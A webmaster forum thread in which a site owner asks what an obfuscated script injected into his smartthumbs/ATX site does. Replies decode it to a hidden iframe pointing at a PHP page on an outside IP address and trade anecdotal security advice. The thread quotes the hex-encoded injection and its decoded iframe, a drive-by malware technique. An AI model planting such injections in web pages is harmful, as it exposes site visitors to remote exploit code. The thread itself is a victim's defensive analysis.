One of my sites hacked, question about code
 

So I just found out someone managed to add some javascript/exploit to one of my sites. No idea yet how they got in, site is running on smartthumbs/atx, all other sites on the server are fine.

Anyone got an idea what this code is doing :

<script> var s='3C696672616D65207372633D22687474703A2F2F3139352 E352E3131362E3235302F65782F7374617469632E706870222 077696474683D32206865696768743D32207374796C653D226 46973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>

nothing to worry about, ur just paranoid

You smoke too much

Let me throw a wild guess into the wind. Hosting at webair?? LOL

This server is with webair yes, please explain, I just reset my ftp password

Get a more reliable host. I've noticed patterns developing with webair and that "mystical" javascript code showing up magically in the headers of sites hosted on webair. Something is being exploited within the webair administration interface for sure. Just don't know what. :2 cents:

It's true that I never experienced anything like this with my servers at nationalnet or phatservers but I though webair has a good reputation, lots of webmasters using them

http://www.gofuckyourself.com/showthread.php?t=787142

:(:(:(:(:(:(:(

time to change your ftp login!

I wish it was that simple

since i keep my templates in comus and st set to 644 or 444 permissions i havent had any iframes added to my pages anymore.

The code writes this to your web pages:

<iframe src="http://195.5.116.250/ex/static.php" width=2 height=2 style="display:none"></iframe>

Did you upgrade your ATX recently? They had a security update last week I believe.

read this: http://askdamage.com/t21776-p2-we-ne...urity-now.html

Thanks for the info

Hmmm......... seems I'm not the only one, chmodded my smart thumbs templates to 444 and until now I'm fine again

get another host, not going to promote mine here, but do yourself a favor and get out of that webair oversold crap

What do you mean with oversold?? It's a dedicated server with zero downtime since 1 year+, so far I'm happy with them

bummpppppp

this happened to one of my SSH accounts last week

TURN THAT SHIT OFF UNLESS YOU NEED IT

the script interprets out to an invisible iframe... go figure =/

again, secure your sites by turning off ssh and contact your host to see anymore information that can dig up for you and to protect it from happening in the future.